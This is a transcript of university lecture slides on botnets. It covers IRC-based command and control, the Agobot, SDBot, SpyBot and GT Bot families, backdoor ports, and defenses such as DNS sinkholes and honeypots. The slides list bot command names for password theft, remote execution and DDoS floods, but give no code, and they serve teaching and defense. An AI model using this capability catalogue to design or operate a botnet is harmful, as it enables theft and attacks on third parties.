CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012.

Slides:



Advertisements
Similar presentations
By Hiranmayi Pai Neeraj Jain
Advertisements

MOSQUITO BREEDING ATTACK: Spread of bots using Peer To Peer INSTRUCTOR: Dr.Cliff Zou PRESENTED BY : BHARAT SOUNDARARAJAN & AMIT SHRIVATSAVA.
 What is a botnet?  How are botnets created?  How are they controlled?  How are bots acquired?  What type of attacks are they responsible for? 
BotMiner Guofei Gu, Roberto Perdisci, Junjie Zhang, and Wenke Lee College of Computing, Georgia Institute of Technology.
BOTNETS/Cyber Criminals  How do we stop Cyber Criminals.
1 Understanding Botnet Phenomenon MITP Kevin Lynch, Will Fiedler, Navin Johri, Sam Annor, Alex Roussev.
Bots and Botnets CS-431 Dick Steflik. DDoS ● One of the most common ways to mount a Distributed Denial of Service attacks is done via networks of zombie.
Botnet Dection system. Introduction  Botnet problem  Challenges for botnet detection.
Botnets Usman Jafarey Including slides from The Zombie Roundup by Cooke, Jahanian, McPherson of the University of Michigan.
Botnets Abhishek Debchoudhury Jason Holmes. What is a botnet? A network of computers running software that runs autonomously. In a security context we.
Borrowed from Brent ByungHoon Kang, GMU. A Network of Compromised Computers on the Internet IP locations of the Waledac botnet. Borrowed from Brent ByungHoon.
Internet Relay Chat Security Issues By Kelvin Lau and Ming Li.
Internet Relay Chat Chandrea Dungy Derek Garrett #29.
2009/9/151 Rishi : Identify Bot Contaminated Hosts By IRC Nickname Evaluation Reporter : Fong-Ruei, Li Machine Learning and Bioinformatics Lab In Proceedings.
A M ULTIFACETED A PPROACH TO U NDERSTANDING THE B OTNET P HENOMENON Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose, Andreas Terzis Computer Science Department.
CAP6135: Malware and Software Vulnerability Analysis Examples of Term Projects Cliff Zou Spring 2012.
Botnets Uses, Prevention, and Examples. Background Robot Network Programs communicating over a network to complete a task Adapted new meaning in the security.
PROJECT IN COMPUTER SECURITY MONITORING BOTNETS FROM WITHIN FINAL PRESENTATION – SPRING 2012 Students: Shir Degani, Yuval Degani Supervisor: Amichai Shulman.
Sravanthi Vattikuti Sri Harsha Devabhaktuni
Botnets An Introduction Into the World of Botnets Tyler Hudak
Introduction to Honeypot, Botnet, and Security Measurement
MSIT 458 – The Chinchillas. Offense Overview Botnet taxonomies need to be updated constantly in order to remain “complete” and are only as good as their.
B OTNETS T HREATS A ND B OTNETS DETECTION Mona Aldakheel
Article presentation for: The Dark Cloud: Understanding and Defending against Botnets and Stealthy Malware Based on article by: Jaideep Chandrashekar,
BotNet Detection Techniques By Shreyas Sali
Network Security Introduction Some of these slides have been modified from slides of Michael I. Shamos COPYRIGHT © 2003 MICHAEL I. SHAMOS.
Lecture 14 Page 1 CS 236 Online Worms Programs that seek to move from system to system –Making use of various vulnerabilities Other performs other malicious.
Bots Used to Facilitate Spam Matt Ziemniak. Discuss Snort lab improvements Spam as a vehicle behind cyber threats Bots and botnets What can be done.
A N I NSIDE L OOK AT B OTNETS ARO-DHS S PECIAL W ORKSHOP ON M ALWARE D ETECTION, 2005 Written By: Paul Barford and Vinod Yegneswaran University of Wisconsin,
Topics to be covered 1. What are bots,botnet ? 2.How does it work? 4.Prevention of botnet. 3.Types of botnets.
1 Figure 4-16: Malicious Software (Malware) Malware: Malicious software Essentially an automated attack robot capable of doing much damage Usually target-of-opportunity.
A Multifaceted Approach to Understanding the Botnet Phenomenon Authors : Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose, Andreas Terzis Computer Science.
1 An Advanced Hybrid Peer-to-Peer Botnet Ping Wang, Sherri Sparks, Cliff C. Zou School of Electrical Engineering & Computer Science University of Central.
Nullcon Goa 2010http://nullcon.net Botnet Mitigation, Monitoring and Management - Harshad Patil.
BOTNETS Presented By : Ramesh kumar Ramesh kumar 08EBKIT049 08EBKIT049 A BIGGEST THREAT TO INERNET.
Trojan Virus By Forbes and Mark. What is a Trojan virus Trojans are malicious programs that perform actions that have not been authorised by the user.
Week 10-11c Attacks and Malware III. Remote Control Facility distinguishes a bot from a worm distinguishes a bot from a worm worm propagates itself and.
A MULTIFACETED APPROACH TO UNDERSTANDING THE BOTNET PHENOMENON Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose & Andreas Terzis IMC’06.
1 Honeypot, Botnet, Security Measurement, Spam Cliff C. Zou CDA /01/07.
AN INSIDE LOOK AT BOTNETS Barford, Paul and Yegneswaran Advances in Information Security, Springer, 2006 Kishore Padma Raju.
Published: Internet Measurement Conference (IMC) 2006 Presented by Wei-Cheng Xiao 2015/11/221.
Omar Hemmali CAP 6135 Paul Barford Vinod Yegneswaran Computer Sciences Department University of Wisconsen, Madison.
An Inside Look at Botnets By Paul Barford and Vinod Yegneswaran In Series: Advances in Information Security, Springer, 2006 Presented by Jared Bott.
Open Malicious Source Symantec Security Response Kaoru Hayashi.
Big Bad Botnet Day! Xeno Kovah In association with the Corporation for Public Botcasting, and Viewers Like You! Xeno Kovah In association with the Corporation.
Understand Malware LESSON Security Fundamentals.
Know your Enemy: Tracking Botnets The Honeynet Project & Research Alliance Presented by: Jonathan Dowdle.
A Multifaceted Approach to Understanding the Botnet Phenomenon Aurthors: Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose, Andreas Terzis Publication: Internet.
Lecture 14 Page 1 CS 236 Online Worms Programs that seek to move from system to system –Making use of various vulnerabilities Other performs other malicious.
BotMiner: Clustering Analysis of Network Traffic for Protocol- and Structure-Independent Botnet Detection Presented by D Callahan.
1 Modeling and Measuring Botnets David Dagon, Wenke Lee Georgia Institute of Technology Cliff C. Zou Univ. of Central Florida Funded by NSF CyberTrust.
Speaker: Hom-Jay Hom Date:2009/10/20 Botnet Research Survey Zhaosheng Zhu. et al July 28-August
Page 1 Viruses. Page 2 What Is a Virus A virus is basically a computer program that has been written to perform a specific set of tasks. Unfortunately,
Botnets Borrowed from Brent ByungHoon Kang, GMU. A Network of Compromised Computers on the Internet IP locations of the Waledac botnet. Borrowed from.
Brett Stone-Gross, Marco Cova, Lorenzo Cavallaro, Bob Gilbert, Martin Szydlowski, Richard Kemmerer, Christopher Kruegel, and Giovanni Vigna Proceedings.
1 Botnets Group 28: Sean Caulfield and Fredrick Young ECE 4112 Internetwork Security Prof. Henry Owen.
Presented by : Matthew Sulkosky COSC 316 (Host Security) BOTNETS A.K.A ZOMBIE COMPUTING.
Botnets A collection of compromised machines
Botnets Usman Jafarey Including slides from The Zombie Roundup by Cooke, Jahanian, McPherson of the University of Michigan.
Acknowledgement This lecture uses some contents from the lecture notes from: Dr. Dawn Song: CS161: computer security Richard Wang – SophosLabs: The Development.
Acknowledgement This lecture uses some contents from the lecture notes from: Dr. Dawn Song: CS161: computer security Richard Wang – SophosLabs: The Development.
Botnets A collection of compromised machines
Modeling and Measuring Botnets
Acknowledgement This lecture uses some contents from the lecture notes from: Dr. Dawn Song: CS161: computer security Richard Wang – SophosLabs: The Development.
Acknowledgement This lecture uses some contents from the lecture notes from: Dr. Dawn Song: CS161: computer security Richard Wang – SophosLabs: The Development.
“A Multifaceted Approach to Understanding the Botnet Phenomenon”
Botnets Usman Jafarey Including slides from The Zombie Roundup by Cooke, Jahanian, McPherson of the University of Michigan.
Acknowledgement This lecture uses some contents from the lecture notes from: Dr. Dawn Song: CS161: computer security Richard Wang – SophosLabs: The Development.
Introduction to Internet Worm
Presentation transcript:

CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012

2 Acknowledgement  This lecture uses some contents from the lecture notes from:  Dr. Dawn Song: CS161: computer securityCS161: computer security  Richard Wang – SophosLabs: The Development of BotnetsThe Development of Botnets  Randy Marchany - VA Tech IT Security Lab: BotnetsBotnets

3  Collection of compromised hosts  Spread like worms and viruses  Once installed, respond to remote commands  A network of ‘ bots ’  robot : an automatic machine that can be programmed to perform specific tasks.  Also known as ‘ zombies ’

4  Platform for many attacks  Spam forwarding (70% of all spam?)  Click fraud  Keystroke logging  Distributed denial of service attacks  Serious problem  Top concern of banks, online merchants  Vint Cerf: ¼ of hosts connected to Internet

5 What are botnets used for?

6 IRC (Internet Relay Chat) based Control

7

8 Why IRC?  IRC servers are:  freely available  easy to manage  easy to subvert  Attackers have experience with IRC  IRC bots usually have a way to remotely upgrade victims with new payloads to stay ahead of security efforts

9 How bad is the problem?  Symantec identified a 400K node botnet  Netadmin in the Netherlands discovered 1-2M unique IPs associated with Phatbot infections.  Phatbot harvests MyDoom and Bagel infected machines.  Researchers in Gtech monitored thousands of botnets

10 Spreading Problem  Spreading mechanism is a leading cause of background noise  Port 445, 135, 139, 137 accounted for 80% of traffic captured by German Honeynet Project  Other ports  2745 – bagle backdoor  3127 – MyDoom backdoor  3410 – Optix trojan backdoor  5000 – upnp vulnerability

Most commonly used Bot families  Agobot  SDBot  SpyBot  GT Bot

Agobot  Most sophisticated  20,000 lines C/C++ code  IRC based command/control  Large collection of target exploits  Capable of many DoS attack types  Shell encoding/polymorphic obfuscation  Traffic sniffers/key logging  Defend/fortify compromised system  Ability to frustrate dissassembly

SDBot  Simpler than Agobot, 2,000 lines C code  Non-malicious at base  Utilize IRC-based command/control  Easily extended for malicious purposes  Scanning  DoS Attacks  Sniffers  Information harvesting  Encryption

SpyBot  <3,000 lines C code  Possibly evolved from SDBot  Similar command/control engine  No attempts to hide malicious purposes

GT Bot  Functions based on mIRC scripting capabilities  HideWindow program hides bot on local system  Basic rootkit function  Port scanning, DoS attacks, exploits for RPC and NetBIOS

 Variance in codebase size, structure, complexity, implementation  Convergence in set of functions  Possibility for defense systems effective across bot families  Bot families extensible  Agobot likely to become dominant

 All of the above use IRC for command/control  Disrupt IRC, disable bots  Sniff IRC traffic for commands  Shutdown channels used for Botnets  IRC operators play central role in stopping botnet traffic  But a botnet could use its own IRC server  Automated traffic identification required  Future botnets may move away from IRC  Move to P2P communication  Traffic fingerprinting still useful for identification Control

Host control  Fortify system against other malicious attacks  Disable anti-virus software  Harvest sensitive information  PayPal, software keys, etc.  Economic incentives for botnets  Stresses need to patch/protect systems prior to attack  Stronger protection boundaries required across applications in OSes

19 Example Botnet Commands  Connection  CLIENT: PASS  HOST : (if error, disconnect)  CLIENT: NICK  HOST : NICKERROR | CONNECTED  Pass hierarchy info  BOTINFO  BOTQUIT

20 Example Botnet Commands  IRC Commands  CHANJOIN  CHANPART  CHANOP  CHANKICK  CHANBANNED  CHANPRIORITY

21 Example Botnet Commands  pstore  Display all usernames/passwords stored in browsers of infected systems  bot.execute  Run executable on remote system  bot.open  Reads file on remote computer  bot.command  Runs command with system()

22 Example Botnet Commands  http.execute  Download and execute file through http  ftp.execute  ddos.udpflood  ddos.synflod  ddos.phaticmp  redirect.http  redirect.socks

23 Current Botnet Control Architecture bot C&C botmaster bot C&C More than one C&C server Spread all around the world

24 Botnet Monitor: Gatech KarstNet  A lot bots use Dyn- DNS name to find C&C bot C&C attacker C&C KarstNet sinkhole cc1.com  KarstNet informs DNS provider of cc1.com  Detect cc1.com by its abnormal DNS queries  DNS provider maps cc1.com to Gatech sinkhole (DNS hijack) bot  All/most bots attempt to connect the sinkhole

Botnet Monitor: Honeypot Spy  Security researchers set up honeypots  Honeypots: deliberately set up vulnerable machines  When compromised, put close monitoring of malware’s behaviors  Tutorial:  When compromised honeypot joins a botnet  Passive monitoring: log all network traffic  Active monitoring: actively contact other bots to obtain more information (neighborhood list, additional c&c, etc.)  Representative research paper:  A multifaceted approach to understanding the botnet phenomenon, Abu Rajab, Moheeb and Zarfoss, Jay and Monrose, Fabian and Terzis, Andreas, 6th ACM SIGCOMM conference on Internet measurement (IMC), A multifaceted approach to understanding the botnet phenomenon 25

26 The Future Generation of Botnets  Peer-to-Peer C&C  Polymorphism  Anti-honeypot  Rootkit techniques

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com. Inc. All rights reserved.